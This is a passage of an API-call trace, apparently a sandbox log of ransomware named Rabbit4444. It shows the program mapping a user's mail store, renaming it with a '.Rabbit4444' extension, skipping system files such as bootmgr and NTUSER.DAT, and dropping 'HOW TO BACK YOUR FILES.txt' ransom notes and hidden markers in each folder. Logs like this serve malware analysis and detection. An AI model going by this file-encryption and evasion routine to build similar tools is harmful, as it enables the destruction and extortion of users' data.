"c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\localstate\\hxstore.hxd"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0063.724] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0063.724] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15503468509) returned 1 [0063.724] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4194304) returned 1 [0063.724] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0063.724] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0063.724] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x400300, lpName=0x0) returned 0x2a0 [0063.725] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x400000, dwNumberOfBytesToMap=0x300) returned 0x70000 [0063.725] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x2c20000 [0063.857] UnmapViewOfFile (lpBaseAddress=0x2c20000) returned 1 [0063.876] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0x200000) returned 0x2c20000 [0063.926] UnmapViewOfFile (lpBaseAddress=0x2c20000) returned 1 [0063.946] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123840 [0063.946] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0063.946] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123840 | out: hHeap=0xe0000) returned 1 [0063.946] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0063.946] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e200 [0063.947] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0063.947] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e200 | out: hHeap=0xe0000) returned 1 [0063.947] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0063.947] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15525740999) returned 1 [0063.947] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0063.947] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0063.947] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.947] CloseHandle (hObject=0x2a0) returned 1 [0063.947] CloseHandle (hObject=0x278) returned 1 [0063.947] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\HxStore.hxd.Rabbit4444") returned 122 [0063.947] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\HxStore.hxd" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\localstate\\hxstore.hxd"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\HxStore.hxd.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\localstate\\hxstore.hxd.rabbit4444"), dwFlags=0x1) returned 1 [0063.948] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f23f1b3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2f23f1b3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2f23f1b3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalFiles", cAlternateFileName="LOCALF~1")) returned 1 [0063.948] lstrcmpiW (lpString1="LocalFiles", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.948] lstrcmpiW (lpString1="LocalFiles", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.948] lstrcmpiW (lpString1="LocalFiles", lpString2="Rabbit4444.exe") returned -1 [0063.948] lstrcmpiW (lpString1="LocalFiles", lpString2=".") returned 1 [0063.948] lstrcmpiW (lpString1="LocalFiles", lpString2="..") returned 1 [0063.948] lstrcmpiW (lpString1="LocalFiles", lpString2="windows") returned -1 [0063.948] lstrcmpiW (lpString1="LocalFiles", lpString2="bootmgr") returned 1 [0063.948] lstrcmpiW (lpString1="LocalFiles", lpString2="pagefile.sys") returned -1 [0063.948] lstrcmpiW (lpString1="LocalFiles", lpString2="boot") returned 1 [0063.949] lstrcmpiW (lpString1="LocalFiles", lpString2="ids.txt") returned 1 [0063.949] lstrcmpiW (lpString1="LocalFiles", lpString2="NTUSER.DAT") returned -1 [0063.949] lstrcpyW (in: lpString1=0x130ec00, lpString2="LocalFiles" | out: lpString1="LocalFiles") returned="LocalFiles" [0063.949] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220e0 [0063.949] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xde) returned 0x126308 [0063.949] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1220e8 | out: ListHead=0xf68b0, ListEntry=0x1220e8) returned 0x1221e8 [0063.949] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4d91a174, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd192b563, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x4d91a174, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Photos", cAlternateFileName="")) returned 1 [0063.949] lstrcmpiW (lpString1="Photos", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.949] lstrcmpiW (lpString1="Photos", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.949] lstrcmpiW (lpString1="Photos", lpString2="Rabbit4444.exe") returned -1 [0063.949] lstrcmpiW (lpString1="Photos", lpString2=".") returned 1 [0063.949] lstrcmpiW (lpString1="Photos", lpString2="..") returned 1 [0063.949] lstrcmpiW (lpString1="Photos", lpString2="windows") returned -1 [0063.949] lstrcmpiW (lpString1="Photos", lpString2="bootmgr") returned 1 [0063.949] lstrcmpiW (lpString1="Photos", lpString2="pagefile.sys") returned 1 [0063.949] lstrcmpiW (lpString1="Photos", lpString2="boot") returned 1 [0063.949] lstrcmpiW (lpString1="Photos", lpString2="ids.txt") returned 1 [0063.949] lstrcmpiW (lpString1="Photos", lpString2="NTUSER.DAT") returned 1 [0063.949] lstrcpyW (in: lpString1=0x130ec00, lpString2="Photos" | out: lpString1="Photos") returned="Photos" [0063.949] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122280 [0063.949] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd6) returned 0x123840 [0063.949] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122288 | out: ListHead=0xf68b0, ListEntry=0x122288) returned 0x1220e8 [0063.949] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4d91a174, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd192b563, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x4d91a174, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Photos", cAlternateFileName="")) returned 0 [0063.949] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0063.949] lstrcpyW (in: lpString1=0x130ec00, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.949] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.950] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.950] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.951] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.951] CloseHandle (hObject=0x278) returned 1 [0063.951] CloseHandle (hObject=0x298) returned 1 [0063.951] GetCurrentThreadId () returned 0xd98 [0063.951] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122288 [0063.951] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Photos", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Photos") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Photos" [0063.951] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123840 | out: hHeap=0xe0000) returned 1 [0063.951] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122280 | out: hHeap=0xe0000) returned 1 [0063.951] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Photos" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Photos") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Photos" [0063.951] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Photos", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Photos\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Photos\\" [0063.951] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Photos\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Photos\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Photos\\.BFC0E91B00AE8A0620D3" [0063.951] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Photos\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\localstate\\photos\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0063.954] WriteFile (in: hFile=0x278, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.956] FlushFileBuffers (hFile=0x278) returned 1 [0063.957] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Photos\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.957] CloseHandle (hObject=0x278) returned 1 [0063.957] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Photos") returned 106 [0063.957] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.957] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Photos\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4d91a174, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd192b563, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef71262a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0063.958] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.958] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.958] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.958] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.958] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4d91a174, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd192b563, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef71262a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.958] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.958] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.958] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.958] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.958] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.958] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef71262a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef71262a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef71262a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.958] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.958] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.958] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef71262a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef71262a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef71262a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.958] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0063.958] lstrcpyW (in: lpString1=0x130ec0e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.958] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Photos\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\localstate\\photos\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x278 [0063.959] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0063.959] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.960] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.960] CloseHandle (hObject=0x2a0) returned 1 [0063.960] CloseHandle (hObject=0x278) returned 1 [0063.960] GetCurrentThreadId () returned 0xd98 [0063.960] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1220e8 [0063.960] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles" [0063.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x126308 | out: hHeap=0xe0000) returned 1 [0063.960] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220e0 | out: hHeap=0xe0000) returned 1 [0063.960] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles" [0063.960] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles\\" [0063.960] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles\\.BFC0E91B00AE8A0620D3" [0063.960] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\localstate\\localfiles\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0063.962] WriteFile (in: hFile=0x278, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.965] FlushFileBuffers (hFile=0x278) returned 1 [0063.968] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.968] CloseHandle (hObject=0x278) returned 1 [0063.969] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles") returned 110 [0063.969] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.969] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\LocalFiles\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f23f1b3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2f23f1b3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xef738643, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0063.969] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.969] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.969] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.969] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.969] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f23f1b3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2f23f1b3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xef738643, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.969] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.969] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.969] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.969] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.969] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.969] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef738643, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef738643, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef738643, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.970] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.970] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.970] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f23f1b3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2f23f1b3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2f23f1b3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="923", cAlternateFileName="")) returned 1 [0063.970] lstrcmpiW (lpString1="923", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.970] lstrcmpiW (lpString1="923", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.970] lstrcmpiW (lpString1="923", lpString2="Rabbit4444.exe") returned -1 [0063.970] lstrcmpiW (lpString1="923", lpString2=".") returned 1 [0063.970] lstrcmpiW (lpString1="923", lpString2="..") returned 1 [0063.970] lstrcmpiW (lpString1="923", lpString2="windows") returned -1 [0063.970] lstrcmpiW (lpString1="923", lpString2="bootmgr") returned -1 [0063.970] lstrcmpiW (lpString1="923", lpString2="pagefile.sys") returned -1 [0063.970] lstrcmpiW (lpString1="923", lpString2="boot") returned -1 [0063.970] lstrcmpiW (lpString1="923", lpString2="ids.txt") returned -1 [0063.970] lstrcmpiW (lpString1="923", lpString2="NTUSER.DAT") returned -1 [0063.970] lstrcpyW (in: lpString1=0x130ec16, lpString2="923" | out: lpString1="923") returned="923" [0063.970] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fe0 [0063.970] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xe6) returned 0x117378 [0063.970] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fe8 | out: ListHead=0xf68b0, ListEntry=0x121fe8) returned 0x1221e8 [0063.970] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f23f1b3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2f23f1b3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2f23f1b3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="923", cAlternateFileName="")) returned 0 [0063.970] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) 